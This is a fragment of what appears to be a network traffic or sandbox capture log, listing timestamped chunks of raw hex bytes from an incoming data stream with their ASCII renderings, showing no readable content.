de 55
                                          Data Ascii: pamP|Xll"c9SqZbyQc!d;{y1$yfkr%0+zFz#&G/P(vlXBz#c~eE,~<WzZ1-p3?*S8{NLySdE3w:<z;sv1G9_X`Q4^UY._1U
                                          2021-09-27 15:30:10 UTC156INData Raw: 64 53 9f c6 3d db fa dd a0 33 3a 21 29 2a f0 24 98 ed fc 10 c3 a9 7e 8f e9 97 c2 a4 cb a2 e5 f3 5b ab a3 06 dc e5 84 b9 73 29 cf cd d2 8b ce 72 bd eb 03 ff 46 60 48 02 b4 2a c2 80 f0 4e f0 05 8d 0a 1d e3 25 d8 65 7d 06 dd 1b f4 74 6b 94 95 01 6e 80 d4 b5 30 ee e6 00 42 3e 3c fa 8b f8 60 b3 7d 50 09 5f 10 44 8a da 0e d3 df 00 cb fb cc 56 eb 4e fb 84 fe f7 a1 06 cc 41 5b ad 59 5f fb a8 85 fa 23 df f1 df 29 c5 fc ff c4 27 cd af fa a3 eb e5 b5 ea 41 d7 8e fb 7e 7a 01 0a 54 4b 15 32 a4 0b bc e2 c4 fa 17 d5 6b 09 bb a8 71 db 67 ea 34 e0 6c a1 45 5f a2 56 9f 9c 49 a9 0a be 15 d4 23 3e 83 7e 9e aa 31 9f 8c 51 2c e5 dd 2e e6 1b a7 1d 0e 92 d3 c7 ef 1e ed 70 4c 65 18 06 88 d2 c8 df eb 69 4e ab 2e 63 56 4f 30 c5 8b ad 3d c2 08 32 aa 70 2d 20 d0 d8 cd 67 f9 f1 2d 65
                                          Data Ascii: dS=3:!)*$~[s)rF`H*N%e}tkn0B><`}P_DVNA[Y_#)'A~zTK2kqg4lE_VI#>~1Q,.pLeiN.cVO0=2p- g-e
                                          2021-09-27 15:30:10 UTC157INData Raw: 3a 19 91 43 56 27 41 5a e6 4b d3 ec 77 33 15 f6 58 68 c9 eb d2 60 6e 44 b7 8b c2 d7 ed 87 40 3e 6b 0d 0d 97 96 6e 9b b8 86 94 a8 15 a9 e4 8c d4 5e 91 ce fe 20 3e 33 5d 10 d9 dc 02 80 f8 3a 45 7b 6f 42 53 51 3b c7 48 37 64 f9 72 37 db 6f ab df 67 21 e3 de c9 02 aa 66 6d 7a 53 79 00 fe 96 7b 03 2f 37 08 81 64 18 57 0c 2f b8 54 a3 ec 0a 69 a9 61 e6 5b 98 3d a4 4a 0a ee d1 be 83 1b 1e 1e 9f b6 65 2e 15 e0 52 07 35 2d 62 6f f8 31 79 58 ba 42 c3 52 29 35 93 7c 00 6d a6 7f 0e fb 8c bf b7 3f e4 12 e4 4b 78 f9 ba 90 1a ae 24 71 11 69 30 02 cd 28 f1 6b 2f 20 28 e3 48 45 7e cf 39 fb 16 d4 b7 38 86 d8 39 37 2a fb 6d aa 2b 7b f9 39 a4 26 47 1a a1 4a 6a 18 52 85 37 10 69 09 81 54 8a 84 2c 64 18 63 55 37 21 fe ab a3 2d ae 28 3c f7 01 83 83 8d 02 d8 3e 71 7a aa 4f 1d 2b
                                          Data Ascii: :CV'AZKw3Xh`nD@>kn^ >3]:E{oBSQ;H7dr7og!fmzSy{/7dW/Tia[=Je.R5-bo1yXBR)5|m?Kx$qi0(k/ (HE~9897*m+{9&GJjR7iT,dcU7!-(<>qzO+
                                          2021-09-27 15:30:10 UTC159INData Raw: 5f 4f 0c 58 5f b6 92 7b 16 02 e9 d1 bb e3 a6 51 3f 79 8d 5c 32 1d 5b 85 b4 92 df 3b 7c ba 99 4e 23 bf 52 5d 62 14 96 94 c0 89 9e 40 d3 12 92 a3 5f 9c ea 28 db fa cd b5 ee ab e1 a0 b5 23 fd fb 48 b4 8c e4 f9 3d 67 f8 d0 e0 a7 e4 78 ab dc 36 d3 07 6e 45 34 a0 57 9e d1 bd 06 8d 62 d2 59 70 b9 85 53 ee fe e9 42 a8 7c dd c7 2d 3e 94 89 4f 02 60 d7 25 3d 95 aa a4 b9 1b 76 16 a4 77 a3 de fd a4 e3 b1 60 09 f6 27 24 e1 77 26 36 a3 24 ae 72 18 31 3c 2e 9c 5d c7 e4 04 c7 f7 45 2e 65 2f ee 7d 51 3b 95 76 5c 4d 5c 93 78 a9 91 04 b7 98 ed 14 fb 84 7a 5d 2f 3c 71 59 03 11 44 82 1d 46 ef 94 b1 2d 8f 93 2f f9 2f fe 36 86 38 b3 1a d2 54 8f 69 7b 9c 61 bf 8a 25 93 3f c4 3d 92 3d 31 8a e7 68 45 f0 66 05 fb aa 42 53 cb 10 ea 3e 9a 91 0c 5c 5c 74 82 53 c4 dc 8f a0 83 4e 0f 1b
                                          Data Ascii: _OX_{Q?y\2[;|N#R]b@_(#H=gx6nE4WbYpSB|->O`%=vw`'$w&6$r1<.]E.e/}Q;v\M\xz]/<qYDF-//68Ti{a%?==1hEfBS>\\tSN
                                          2021-09-27 15:30:10 UTC160INData Raw: d0 59 74 b9 4c 39 e4 35 cd 5b e3 21 45 e3 7c 5b 6a 26 25 96 d3 d0 16 9a b2 d7 a8 4a 18 57 63 f9 71 18 4c 22 3d 89 74 b1 91 33 42 5c b2 0b 28 81 a4 ac 14 2e 37 cc d5 b9 89 a9 d6 3f 4a 13 42 5f d4 d3 2a dc cf c6 eb e5 59 0b 53 3b 77 f8 2f 6e 5d 8f 8d ce ef 87 25 46 ff 66 3e e8 86 ad e0 d4 ba a4 f2 10 c5 ad 97 32 b8 97 1d 98 5b 26 cb 8a 2a 3a 79 ca 03 c0 80 bc 94 b6 d7 74 51 b5 d9 b9 d4 80 16 f9 c1 f0 a2 9e 06 a6 4b 18 ef 8e 38 ef 7d e4 44 ef 6f 8f 02 9d 87 fb d0 7e 59 45 d5 ad 6d 3f 13 da 10 57 7a 3b 3f 0d 96 5f 07 79 9c 72 b9 25 4c 58 ea 0e 7a 2e ff 1f 6d d3 d8 e6 e0 6f f1 72 89 10 33 e0 f1 8c 7a 3b 88 f0 e3 fd f0 d8 0f e5 39 8f db 8e e5 3d 87 a3 b8 33 f4 06 d7 1b 05 a2 45 18 e7 d4 f0 27 98 41 c8 87 0a 98 3d f0 b8 ff 1e bb 90 cf 88 6f c9 de ba f3 40 97 46
                                          Data Ascii: YtL95[!E|[j&%JWcqL"=t3B\(.7?JB_*YS;w/n]%Ff>2[&*:ytQK8}Do~YEm?Wz;?_yr%LXz.mor3z;9=3E'A=o@F
                                          2021-09-27 15:30:10 UTC161INData Raw: d6 06 f1 4d 19 df 2d a2 06 dc 0d 8a 81 0a af f6 3d b5 00 1e cd 53 12 7c 2b f3 94 2a ff 21 13 51 57 45 e8 98 38 0a 6c 82 8e f1 af c3 28 51 3d ea 3e ab 81 90 17 3d 7c 39 b1 88 1c 53 c1 82 67 bb b4 9b e6 0f 3c 72 65 70 bb 64 c8 50 47 a6 70 17 ab 55 6e 0b 7e 3f 47 2f 75 66 d7 2d 29 82 50 79 09 28 87 9d 6d 23 33 39 78 ce 58 3a ca 7c 8b b6 9e a3 1e f7 25 4b 08 a3 36 eb 66 f5 c7 0a d7 7d 85 89 ea 28 ae 32 80 9c 4f 6d cc ee 14 5d 25 98 30 13 b4 ad d6 c9 08 27 23 84 44 8d b3 f5 ee f2 a0 0b 23 e3 27 3c ef 69 0e 32 ab 27 9f 60 52 27 25 d7 7d ba 36 5b f9 28 08 a6 91 ae 81 5d bb cc f8 6f a0 85 98 81 4e a5 db c8 c6 64 47 2d 4b ce 53 3e 70 de cd 99 a9 e2 f1 af db 2e a7 40 48 65 40 a0 59 e1 80 27 3c f0 50 bc 76 8f 5a da 2a b1 a8 70 83 42 7b a7 62 c3 62 d3 02 c7 c3 6e 8d
                                          Data Ascii: M-=S|+*!QWE8l(Q=>=|9Sg<repdPGpUn~?G/uf-)Py(m#39xX:|%K6f}(2Om]%0'#D#'<i2'`R'%}6[(]oNdG-KS>p.@He@Y'<PvZ*pB{bbn
                                          2021-09-27 15:30:10 UTC162INData Raw: 22 41 e7 25 ab b3 2a 32 9b 26 e0 87 78 a7 5c bc 4f 8f 65 2e 15 de 72 04 e7 84 2c ad 58 54 c3 ff 9c 18 4c d1 8b 91 5b 39 05 56 90 1e 70 25 74 a3 34 84 68 fa 78 ea f8 2b 9b a8 e8 a5 77 c0 3d bf 6b f3 0c bd 8f e6 28 30 85 fb e5 f5 5b 62 c5 8f 55 70 06 ce d1 36 81 36 43 00 4a 21 5c 39 f5 ac 54 ba f7 49 dd 2e d4 e6 04 5a 55 ff 5b 66 a3 50 e4 c7 10 86 2c a8 2e f9 a1 54 bf df 43 32 4a cf 6a 37 f5 ff 87 ba 4d 42 81 2e 2e 18 94 53 8d 81 50 a3 5a 01 d5 6f a8 1e 8e 85 82 84 19 b6 e8 3a 9b 52 24 ad 48 35 5b 08 de 55 48 da 06 b7 74 70 7e f9 a5 41 32 45 ac be c2 89 c0 3c 56 3d fb 25 42 64 19 c5 e8 ed af 44 18 82 fa 29 6a ed 5a 56 64 06 97 8c 83 90 98 43 82 06 b4 a4 59 a3 e4 3e d6 ab c1 bd f4 8a f7 b1 a0 19 e3 fc 4d dc b4 c9 e0 35 78 87 d5 c7 97 d0 6a a0 cf 9c cd 33 46
                                          Data Ascii: "A%*2&x\Oe.r,XTL[9Vp%t4hx+w=k(0[bUp66CJ!\9TI.ZU[fP,.TC2Jj7MB..SPZo:R$H5[UHtp~A2E<V=%BdD)jZVdCY>M5xj3F
                                          2021-09-27 15:30:10 UTC163INData Raw: 56 85 4a 6a d6 d0 30 d1 99 e2 e1 e4 7f 27 12 af 5d a0 91 3f e3 0a d2 39 3a d2 d1 ce 73 97 d1 40 e2 4d 6c 0c b9 67 7d 8c 42 95 02 5f c3 88 f8 23 c2 02 56 6d 63 0f c7 6a 45 6b e6 2f c4 28 ff 52 22 c6 f2 a2 04 a4 69 25 63 0b e6 46 0a fb f1 b7 6d b2 d0 93 74 a3 15 5e f0 63 41 ed 5b 25 4c cc 98 a5 a4 d7 19 06 3b 4f 35 1e 0b 10 75 dd f8 bb 4b 47 e9 9a 79 7f 56 86 a0 7b 9b 35 bc 94 d1 29 eb e8 a8 39 88 27 f6 61 c0 a1 63 a0 a8 1b 37 3c 4e f9 9e 8a cd 6f 32 2f 11 67 b0 58 71 45 13 02 11 11 86 ab 44 b9 b7 90 21 b0 a2 c7 e6 7d 25 6b 76 d3 d8 15 9c d7 b4 70 19 bf 55 d9 10 4b 34 b3 f6 db 32 ec a1 c5 b7 7e 14 7a 5b eb 25 1a 79 89 33 81 4c 67 bc 40 5d 43 ae 1e 37 0e b8 84 32 f5 3b a2 fb 8c ad 40 f3 84 4d 24 6a 3a c6 51 02 ee d3 c5 c8 ea 58 c2 8a 4f 84 0d c0 b7 87 36 50
                                          Data Ascii: VJj0']?9:s@Mlg}B_#VmcjEk/(R"i%cFmt^cA[%L;O5uKGyV{5)9'ac7<No2/gXqED!}%kvpUK42~z[%y3Lg@]C72;@M$j:QXO6P
                                          2021-09-27 15:30:10 UTC164INData Raw: ea 23 2e b3 cb be cb 02 cc 7c 57 14 09 85 14 e3 ba 50 a1 37 22 fe a5 d6 99 2a 26 ed 14 b6 25 8f 4e d8 c2 4d 4b 4d 47 9e e0 00 d5 5c db 14 84 62 21 03 9d fd 4f a7 85 2c ac 41 53 c3 ff 81 14 55 d0 57 e6 6d 17 35 78 3a 2a 43 14 50 a3 12 85 b6 ff 7d 8a f8 2b 90 25 6b a5 6a e3 6a be 8c fe 8d bd 9f aa de 34 85 d8 ab 81 00 0a 46 e9 24 70 06 ce 93 4f 38 36 5e 10 7c 20 b3 1b b0 f9 1d fe 1a 4d dd 46 70 e6 3c b7 8f fe 59 44 e1 3c f9 a4 10 86 2d aa 16 f8 59 57 bd df 49 65 99 4d 55 3e e6 ff b8 bb 4f 42 b0 2e 38 dc 83 57 8d 81 4d aa 18 00 d7 39 aa 1e 8e 1c 0f a1 19 f5 f0 3a d0 2f 2c af 4a 33 4b 08 96 a5 4a da 1b 20 38 71 73 c2 a7 41 32 5c 6b 95 c2 88 dd 3c 1b 3e e1 27 40 6e 18 c5 9a e6 af 44 19 c0 b7 28 74 96 58 57 64 0f 5a bc 83 99 99 41 df 29 aa a6 53 88 e4 3e 4a af
                                          Data Ascii: #.|WP7"*&%NMKMG\b!O,ASUWm5x:*CP}+%kjj4F$pO86^| MFp<YD<-YWIeMU>OB.8WM9:/,J3KJ 8qsA2\k<>'@nD(tXWdZA)S>J
                                          2021-09-27 15:30:10 UTC166INData Raw: 64 c5 e5 5e f6 29 6f fa 5a d9 2d df 08 a1 a3 dd 8f 40 56 0d e6 77 60 ba df e7 c5 43 1a 45 43 01 e4 8d c3 7d f1 ee 6c d1 f1 32 19 54 21 b0 ab dc 08 9b 13 9a 34 77 55 8b d7 82 84 9c ee 9d c3 95 15 f4 9f 2d 36 fb 89 4f 63 9a 32 35 2c 8f 2c 70 1c e1 0f d4 de 09 54 8e 28 a2 2f b5 6d 21 c7 94 fc 40 0c 8b 22 05 eb f7 f9 62 fc ba 85 4f 9a ba 94 64 15 1f e1 f3 62 51 69 44 59 3a c7 08 75 91 78 4d 0c 2f f5 29 1e 12 14 60 dc dc bb 39 40 fa 3d 58 43 fa 8a b3 12 c2 dd e8 b7 e4 bb 93 f0 a8 1c bd 8e 8f 79 1d 82 56 13 f4 03 61 19 7b 8d e6 92 22 64 07 4d 5b 7e 67 55 44 f1 5f 1b 9c 19 b3 3e 53 26 2f 90 32 2f dd f8 8e 7a 6b 87 3a ec db 14 d2 1f ed 8c d9 b8 1b 19 64 85 4b b2 b8 ec 61 56 64 c2 f9 5e 60 c0 b8 ea 6b 3c 07 b6 a3 85 02 bc e7 b7 be 4c e0 1f 45 2c 4a 80 7c 22 4f 6c
                                          Data Ascii: d^)oZ-@Vw`CEC}l2T!4wU-6Oc25,,pT(/m!@"bOdbQiDY:uxM/)`9@=XCyVa{"dM[~gUD_>S&/2/zk:dKaVd^`k<LE,J|"Ol
                                          2021-09-27 15:30:10 UTC167INData Raw: 69 fc 14 63 ad a2 b5 a2 cd 14 a4 e7 77 e9 39 24 c7 88 69 f3 b0 ac ff 3a 89 a5 d2 ab 3a ec 2d f1 b2 f9 bd cf f4 83 c0 64 14 0e 85 66 87 c0 4f a7 36 52 05 9c 6f 9e 28 3f ea 2d 55 3c 8f b8 c4 f0 45 4c f6 34 9d d2 2c d3 2e a8 15 91 4f 25 05 ee 20 5e a7 83 2c de 59 47 c1 f9 9c 66 4d c2 89 e1 6f 0e 32 6b a1 28 43 66 4c 91 36 82 68 3a 79 99 fa 2d 9b 1d 6c 97 75 e5 43 f0 6c ec 8a bb 8f 6e 1c 02 87 de b6 77 28 18 a9 ee 26 3f 01 fc d3 68 38 e6 44 03 48 27 5c 90 b0 ea 1f f8 f7 3b dc 55 72 e0 04 48 70 ec 59 43 e1 4e 8a b6 12 80 2c b1 29 ea a3 50 bf 1b 48 76 f7 6a 45 4c fa ef 85 bc b7 31 b3 1c 3a da 94 20 8c 92 52 ab 5b 73 d4 2b aa 1f 8e 05 84 94 1b f4 ed fe 9a 3e 26 ac 48 7c 5c 18 dc a6 4a a8 07 c0 75 76 7e b2 a4 e0 35 5a ac cc c3 15 c7 2f 57 3c fb 5a 6e 7c 18 c7 e8
                                          Data Ascii: icw9$i::-dfO6Ro(?-U<EL4,.O% ^,YGfMo2k(CfL6h:y-luClnw(&?h8DH'\;UrHpYCN,)PHvjEL1: R[s+>&H|\Juv~5Z/W<Zn|
                                          2021-09-27 15:30:10 UTC168INData Raw: 20 c8 29 bd e1 37 43 93 3e 58 6c ec 24 a2 61 96 95 00 86 df 6f b6 6c 46 01 cd 04 c9 c1 6b 93 17 46 a8 62 60 ac fa 71 2c 97 16 f7 35 92 fa 09 a5 52 77 81 e1 83 c1 e1 c3 dc 0a 56 33 56 32 f5 d0 30 9b cc ec c8 f6 7f 11 02 d3 75 02 9b 02 cd ef a0 33 3a 4b dd 41 74 f7 d0 19 c1 56 45 5e cf 81 7b b6 71 9d 02 32 cb a2 c0 32 c2 02 01 1a 7e 09 c7 ca 5f cd fb f6 cc 26 e3 99 4f c0 f2 e2 16 9a 4f e7 62 ba ed ee 10 e9 88 87 4e 9a c8 83 74 65 1f bf e1 72 41 e7 3c 59 48 c6 98 7e 90 61 38 c5 32 fc 28 06 75 13 76 c2 dd ad 4b 85 e8 d6 55 52 65 38 de 10 94 5d 9a a0 d1 52 c4 6f bd 0c 88 91 d9 f9 d9 03 63 1a 82 f1 2f 38 42 85 b0 12 d4 65 32 d2 0d ef 97 20 70 df 05 8c 16 2f 05 21 55 20 b0 80 21 b0 88 9e fe 61 25 38 ef 6c c2 13 9c 16 bb dc 1a 62 57 1c 32 4d 80 b5 f6 f3 37 c0 92
                                          Data Ascii: )7C>Xl$aolFkFb`q,5RwV3V20u3:KAtVE^{q22~_&OObNterA<YH~a82(uvKURe8]Roc/8Be2 p/!U !a%8lbW2M7
                                          2021-09-27 15:30:10 UTC169INData Raw: a6 e5 49 de 77 c2 45 cc 8b ff ab d1 fe 69 ce 06 cb 5b c9 82 7a d6 c9 e2 7f a6 79 c0 40 07 ee 6f 55 8a a4 ea e8 ca 26 a6 e1 66 83 02 91 5c 8e 4c 81 05 bc fd 3c 89 bc d3 81 0c cf 3e 35 96 cb c3 53 f4 cc c7 56 05 08 f7 15 60 b1 75 a1 0a bb 04 a5 6d 98 39 26 f4 13 d1 3a aa 4e 21 5c 47 4a f6 46 8d e1 c4 d4 c8 d5 31 84 5b bc 15 9c 21 4e b4 85 63 ab de 54 e6 ff fc b5 4c d1 8b e7 7e 17 47 79 fe 3e 66 14 d1 01 34 84 68 fe 69 8a 8a 2a 10 14 4e a5 13 40 43 bf 6b ff 99 bd 96 ad 96 20 a0 d8 02 a3 29 0b ab e8 20 68 32 eb c2 6e 1d 36 93 b4 4a 21 5c 1a a1 f9 6f ff 17 59 f8 46 95 40 04 b6 79 ff 4d 45 93 3d 9b ae 36 86 0c 00 2e f9 a1 56 a9 df 3b 64 c3 7d 73 3e d7 56 87 ba b7 43 a4 2e 21 db 4f 50 ab 81 d8 03 5b 01 d5 3b be 1e 4a 1d d1 95 3f f5 09 90 9b 2e 24 ad 59 2b 61 2d
                                          Data Ascii: IwEi[zy@oU&f\L<>5SV`um9&:N!\GJF1[!NcTL~Gy>f4hi*N@Ck ) h2n6J!\oYF@yME=6.V;d}s>VC.!OP[;J?.$Y+a-
                                          2021-09-27 15:30:10 UTC171INData Raw: ce 16 d2 39 f8 b6 ca 87 35 1a 6f 39 9f 66 46 62 b1 80 e7 3f 80 8e da b7 5c d1 6b 15 0f d0 c8 03 95 ce 7d 4b 82 3e 80 1c ec 6b a5 d7 83 bf 72 f3 7c 67 a7 6c c2 79 cd 11 ca d1 71 b9 65 27 d7 60 71 ac da 0e 2c e5 17 42 38 b8 88 d0 6e 5a 66 81 61 e1 c1 dc f1 3a 1e 7c 41 17 43 fe c2 30 ef ab ec 3e f7 a4 1c 28 a1 b4 8d 90 16 cd 93 c6 33 59 4d 2d 46 5e 85 29 d9 ca 43 45 12 aa 81 09 b7 5c 97 28 7d 74 98 ca 25 c2 32 65 1a 88 08 27 de 75 d4 20 02 c5 31 e3 ed 2b c0 2b d6 e6 9d 65 23 17 d9 e7 f9 10 fd e2 87 c3 9c 38 84 5e 17 26 ce eb 65 41 6b 56 59 4b f3 68 79 ba 78 d3 3c 38 eb 28 1e 18 13 04 c3 0b a7 61 41 69 10 5f 45 65 8c b3 10 a2 5c 6a a7 fb a4 59 44 b0 1b 88 91 ca f9 65 85 93 1d 88 83 c6 2b 4f 92 b0 12 c7 65 9c 53 fd ef 9d 52 41 d9 08 9b 16 1b 97 21 bd 35 6b 94
                                          Data Ascii: 95o9fFb?\k}K>kr|glyqe'`q,B8nZfa:|AC0>(3YM-F^)CE\(}t%2e'u 1++e#8^&eAkVYKhyx<8(aAi_Ee\jYDe+OeSRA!5k
                                          2021-09-27 15:30:10 UTC172INData Raw: e2 f9 a9 db 71 f9 a0 97 36 cb 08 23 e2 6c 41 e8 d5 fb 1b c9 bc 5b 73 51 4f 7a 20 50 39 f1 8c ea 59 79 e7 45 cc 8d f7 10 f3 42 2b 99 59 74 d1 c7 a7 7a d6 cf ea 5e b9 30 87 16 69 0d 56 5b af a4 b5 74 c2 0b ba 21 77 ce 38 40 9f 8f 69 81 b1 98 f5 60 87 94 cb cf 38 c2 6b 34 b3 cb bf cf fc a1 c9 78 08 5e 85 20 c0 bf 50 a1 36 31 1c 9f 48 1e 28 71 ed a0 75 3a 8f 4e c5 c4 5f 7e d3 55 9c b6 00 a9 64 db 14 84 63 30 15 ee 20 c1 bb d2 2c c0 14 55 c3 ff 9c 05 4c a3 8a 51 6b 40 35 bc ef 2f 43 14 4d b0 34 f6 69 48 66 dd f8 e3 d6 05 6b a5 77 f2 43 cd 6a 63 8c ea 8f be 53 31 85 d8 b6 90 29 79 aa 2c 38 27 06 7a f3 6e 38 36 43 16 52 15 79 09 b2 ae 1d aa b9 48 dd 46 6d f7 04 c4 78 2c 45 12 e1 dc c5 a4 10 86 2c bb 2e 8b a0 bc bd 88 49 91 a4 6d 55 3e fb f9 9f 8e 92 5f ad 79 38
                                          Data Ascii: q6#lA[sQOz P9YyEB+Ytz^0iV[t!w8@i`8k4x^ P61H(qu:N_~Udc0 ,ULQk@5/CM4iHfkwCjcS1)y,8'zn86CRyHFmx,E,.ImU>_y8
                                          2021-09-27 15:30:10 UTC173INData Raw: 02 24 66 d7 4c cf 76 96 e3 b6 c1 a8 42 d2 2f 8a 68 30 15 b5 82 ab cb 6c e4 98 d7 43 f9 8e 42 d1 13 f8 8a c1 86 47 1b 31 0e eb 14 43 82 b8 aa e7 c7 8b 8f a8 b6 2d e6 1f 2c 55 b0 d8 29 95 f6 58 4a f0 3f 07 2b 99 24 02 f1 86 95 72 87 5f 66 d5 6d 58 4e bb 04 15 51 7b 93 65 47 f0 61 68 ab 40 39 5b 97 a6 66 22 92 88 08 4e 5b 7f 86 a6 d6 b9 e1 5b 4e 1d 56 41 57 62 ff db 37 fc b8 95 c8 32 eb 06 02 a1 74 ac 91 d2 cc 99 f0 4a 3a 93 4b 56 74 85 d1 f6 cb 31 44 38 9c f8 7b 72 e6 8a 02 7d cc b4 cb 57 c3 00 53 63 7e f5 50 dd 5f d4 fc 28 c4 28 e4 df 1d b9 f2 12 8e 8d 4f 23 63 f3 e6 8b 11 97 d4 fe 4e a6 51 94 74 17 1e f7 ea 17 40 f2 60 23 48 be 02 69 90 78 3f 0c 39 99 29 ac 2e 69 76 8e 46 ba 4b 41 e9 23 5e 37 64 5e 85 6a 94 85 07 b7 d1 a4 c5 71 b1 02 8f 43 fc 83 d9 1f c2
                                          Data Ascii: $fLvB/h0lCBG1C-,U)XJ?+$r_fmXNQ{eGah@9[f"N[[NVAWb72tJ:KVt1D8{r}WSc~P_((O#cNQt@`#Hix?9).ivFKA#^7d^jqC
                                          2021-09-27 15:30:10 UTC175INData Raw: 94 91 de 37 5a 89 57 dd 51 82 12 dd 58 b9 c6 0c 72 5f e8 c7 ce 7b 46 83 de bd 69 1a 38 e2 aa a9 b3 32 e0 94 b2 67 e1 7d 86 61 0c 43 bb d5 8f 38 cb cf 4b 60 57 3a ca d4 18 3c a5 8c 42 1a 60 d3 60 0c 8b 82 ab 66 dc 2f cd 59 c0 92 de 93 5f c5 c9 9f 7f 5d 80 87 43 69 e5 10 52 e9 a9 fc 73 b7 26 8a 1b 76 9b 38 b4 d9 86 3a 8c 71 9e 80 3c b1 46 d4 99 38 ea 2e 3d 7f c2 f6 c8 89 cc ab ac 17 08 85 14 85 b6 89 a8 f6 20 79 a5 15 62 29 26 ed 14 54 32 51 4d 8c c3 3a 4a 5a bc 9d e1 00 d5 2d d2 f2 87 a3 23 68 9c 99 b4 a4 85 2c ac 5b 5c 6c dc d5 15 31 d1 67 1d 6e 17 35 78 a0 26 f8 37 8d a3 49 84 9d 04 79 8a f8 2b 9d 1c 5f 80 0f e4 3e bf 7f 04 89 bd 8f aa 0b 30 f7 d9 c1 ad 54 0b 67 13 27 70 06 ce 40 6e 3b 36 c7 3c 37 21 7b e6 b3 f9 1d fe 61 49 af 47 8b e4 79 b6 45 03 5a 45
                                          Data Ascii: 7ZWQXr_{Fi82g}aC8K`W:<B``f/Y_]CiRs&v8:q<F8.= yb)&T2QM:JZ-#h,[\l1gn5x&7Iy+_>0Tg'p@n;6<7!{aIGyEZE
                                          2021-09-27 15:30:10 UTC176INData Raw: ed 56 68 12 df 9f 09 12 ea 63 54 01 31 f7 8a d6 70 25 75 36 1f a9 03 28 b5 82 0d cc db 02 d4 7d d6 1e cb 90 82 9e c4 a5 9d 64 a3 2f 16 70 31 2e ae 64 bf b6 1e 64 df f1 31 f9 da 5b d0 95 fc 6c d5 fb 35 87 6b 28 9f 14 47 84 b9 a3 c7 21 9f f2 da 0e 58 c0 6b 2c 09 b6 d9 99 91 10 5c 37 82 ea 84 0d ec 24 a2 f7 87 b3 53 61 5b 1b a7 83 c6 68 cd 04 c9 57 7a 49 61 a1 f3 1c 71 a6 df 1f 2c 97 16 61 23 cb a9 ee 4a 26 66 a4 64 f0 c1 e1 c3 4a 1c 52 44 b1 66 82 c2 70 ea ba ec c8 f6 e9 07 c1 80 92 a8 ec 16 91 96 d7 33 3a 4b 4b 57 41 80 37 f2 b6 43 3d 17 bb 81 7b b6 e7 8b a1 58 2a b0 b6 25 56 37 74 1a 7e 09 51 dc 00 d1 1a 2b b9 31 53 e8 3a c0 f2 e2 80 8c 43 0f 85 f7 9b f9 dc f8 f3 87 4e 9a 5e 95 fd 12 f8 e3 97 65 a9 6e 47 59 48 c6 0e 68 74 48 d9 0f 44 eb 2b 18 09 13 76 c2
                                          Data Ascii: VhcT1p%u6(}d/p1.dd1[l5k(G!Xk,\7$Sa[hWzIaq,a#J&fdJRDfp3:KKWA7C={X*%V7t~Q+1S:CN^enGYHhtHD+v
                                          2021-09-27 15:30:10 UTC177INData Raw: a5 50 28 f7 d2 3a d8 7a e3 1b 69 5d 74 5e 37 4a b5 6c 31 b7 3b 55 aa 12 6e 56 02 24 a3 f4 90 dc 21 bc 9d 2a c4 23 87 3c a0 58 c5 a7 0d 11 5c 0e c3 ab 4f f5 af ff c0 69 8e 59 e3 af be 55 36 85 a0 2f 39 cf 00 86 ed 62 42 36 d6 69 5c b5 bc 82 7c 55 47 ca 01 77 3d e7 9b a4 1e 05 e7 be c3 89 ff ab d2 68 2f 7a 5a 26 96 bb a7 67 c6 cb e2 7f a5 ef 86 2f 7e 03 11 27 af 9a a5 70 ca 26 a6 77 77 9a 3c 52 d8 f3 69 de a1 9c fd 3c 89 2a d5 2a 20 0c 2f 48 b3 4b af cb f4 cc c7 c0 16 23 81 f2 84 c3 50 03 26 22 04 a5 6d 0e 28 59 f7 f2 55 47 8f 8d d5 c0 47 4a f6 d0 9c b4 04 33 2c a7 14 60 73 21 15 9c 21 d8 a5 bb 37 4a 5a 29 c3 fa 8d 16 4c d1 8b 71 6f 9e 31 9e a1 53 43 32 5c a1 34 84 68 68 78 86 d8 cd 99 79 6b e2 66 e1 43 bf 6b 69 88 0e 8b 4c 1f 4d 85 b0 a7 83 29 0b ab 7e 26
                                          Data Ascii: P(:zi]t^7Jl1;UnV$!*#<X\OiYU6/9bB6i\|UGw=h/zZ&g/~'p&ww<Ri<** /HK#P&"m(YUGGJ3,`s!!7JZ)Lqo1SC2\4hhxykfCkiLM)~&
                                          2021-09-27 15:30:10 UTC178INData Raw: 83 69 1a a0 83 2e 1e d8 92 aa 11 32 67 4f 52 21 e8 b5 52 71 ee 9f 9b fb 0e 60 23 28 20 fe 80 23 2d 8b 78 6a 7b 61 9b 8a 6e bf 13 ec 16 b9 0c 1d b9 c3 06 c2 13 e2 b7 8b f3 a5 c0 90 c3 b7 41 a0 40 10 ee c3 21 2c 36 9a 91 4e a3 b1 37 d6 45 83 17 f5 ae f6 82 e7 2b 1b ec e6 8a 3b 81 4a 38 b1 20 17 6d 12 f8 1a e8 d3 f1 44 d0 3c d3 6c cd f3 37 ea a6 85 42 5c 0a ab 7d 0b 8f df 8e 99 23 76 73 32 1a 63 5f b9 d4 c6 7e a8 e1 04 3d 89 68 a7 c6 28 69 50 dc cc 03 05 2a 1b 5f 08 49 35 dc b5 43 a4 51 e1 31 4c 44 1c 54 9f 33 a1 62 90 de a1 5a df 53 22 54 f5 3e 1e 4f c7 31 0d 72 c9 e8 d2 cd a9 61 dd fd 1f 7e 8c cf e3 aa 3f b3 5e fc 46 95 4b cd 01 9e ef f4 42 bb 43 8f b8 d7 5a 59 0e 57 65 d2 03 e1 3d a5 1a 42 82 7c 01 47 b1 8b bc b3 d0 fe 2f cd cf c0 84 e7 41 78 ab c9 87 67
                                          Data Ascii: i.2gOR!Rq`#( #-xj{anA@!,6N7E+;J8 mD<l7B\}#vs2c_~=h(iP*_I5CQ1LDT3bZS"T>O1ra~?^FKBCZYWe=B|G/Axg
                                          2021-09-27 15:30:10 UTC179INData Raw: 79 47 e1 3c 8b 33 10 a7 2b 4e 2c 84 a1 0b 9d dd 49 65 f5 fa 55 ef fa 19 85 c7 b7 3c 90 2c 38 dc 94 c4 8d d6 57 4c 59 7c d5 9a 8a 1c 8e 1c 83 12 19 0b ec dc 99 53 24 6f 6a 31 5b 08 de 36 4a 02 01 c6 76 0d 7e 23 87 43 32 5c ac 28 c2 14 c2 da 54 42 fb 21 61 6d 18 c5 e8 75 af 42 12 24 f8 54 6a b2 79 54 64 0f 97 1a 83 50 9a a5 80 55 b4 ec 7a 8b e4 3e d6 3c c1 f9 e0 6d f5 cc a0 7b c0 fe 4d 91 b4 5f e0 cf 7a 61 d7 b0 97 5c 49 a2 cf 22 de a4 46 e5 30 76 69 d0 e1 28 18 b8 60 e1 7c c4 89 40 ab ef 05 09 bd b5 81 0e 13 e2 ed c0 68 74 ca 51 0f 89 